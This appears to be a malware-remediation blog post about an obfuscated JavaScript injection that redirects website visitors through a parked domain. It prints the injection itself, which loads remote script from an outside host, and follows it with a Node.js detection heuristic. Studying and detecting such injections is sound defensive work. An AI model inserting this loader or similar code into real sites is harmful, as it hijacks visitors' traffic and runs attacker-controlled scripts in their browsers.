Malicious Injection Redirects Traffic via Parked Domain

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript, which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection looks something like this:

var div_avada=document.createElement('script');div_avada.setAttribute("type","text/javascript");var all_avada=["\x2F\x2F\x68\x74\x6D\x6C\x35\x2E\x6F\x6E\x6C\x2F\x6E\x61\x76\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var b_avada=all_avada[0]+Math[all_avada[1]]();div_avada.setAttribute("src",b_avada);if (typeof div_avada!="undefined");document.getElementsByTagName("head")[0].appendChild(div_avada);

While the variable names used for the injection will vary from site to site, the end result is the same: the injection loads a script from a third-party server, which can pose significant security risks to website traffic when controlled by one or more bad actors.
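Because the variable names change from site to site, a check for this injection has to key on its structure rather than on identifiers. The following Node.js sketch is an added example, not code from the original post: the function names, the four-escape threshold and the example.invalid host in the constructed sample are all assumptions.

```javascript
// Heuristic: a hex-escaped string literal that decodes to a remote URL,
// in a file that also builds a <script> element and sets its src.
const HEX_LITERAL = /(["'])((?:\\x[0-9a-fA-F]{2}){4,})\1/g; // threshold is an assumption
const CREATES_SCRIPT = /createElement\(\s*["']script["']\s*\)/;
const SETS_SRC = /setAttribute\(\s*["']src["']|\.src\s*=/;

// Decode a run of \xNN escapes into readable text.
function decodeHex(escaped) {
  return escaped.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Inspect one file's source text; returns the decoded strings and a verdict.
function inspectSource(source) {
  const decoded = [];
  for (const m of source.matchAll(HEX_LITERAL)) decoded.push(decodeHex(m[2]));
  // Protocol-relative ("//host/...") or absolute http(s) URLs hidden in escapes.
  const remote = decoded.filter(s => /^(https?:)?\/\//i.test(s));
  const loader = CREATES_SCRIPT.test(source) && SETS_SRC.test(source);
  return { suspicious: remote.length > 0 && loader, remote, decoded, loader };
}

// Helper used only to build the constructed sample below.
const hex = s => [...s].map(c =>
  "\\x" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");

// Constructed sample: same shape as the injection shown above, appended to
// legitimate code, with different variable names and a placeholder host.
const SAMPLE_INFECTED =
  'function legit(){return 1;}' +
  'var q_el=document.createElement("script");' +
  'var q_all=["' + hex("//cdn.example.invalid/l.php?") + '","' + hex("random") + '"];' +
  'q_el.setAttribute("src",q_all[0]+Math[q_all[1]]());' +
  'document.getElementsByTagName("head")[0].appendChild(q_el);';

// Constructed sample: an ordinary same-origin script loader, not obfuscated.
const SAMPLE_CLEAN =
  'var s=document.createElement("script");s.src="/static/app.js";' +
  'document.head.appendChild(s);';

console.log(inspectSource(SAMPLE_INFECTED));
console.log(inspectSource(SAMPLE_CLEAN));
```

A hit is a prompt for manual review of the file, since legitimate minified code can also contain escaped strings.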
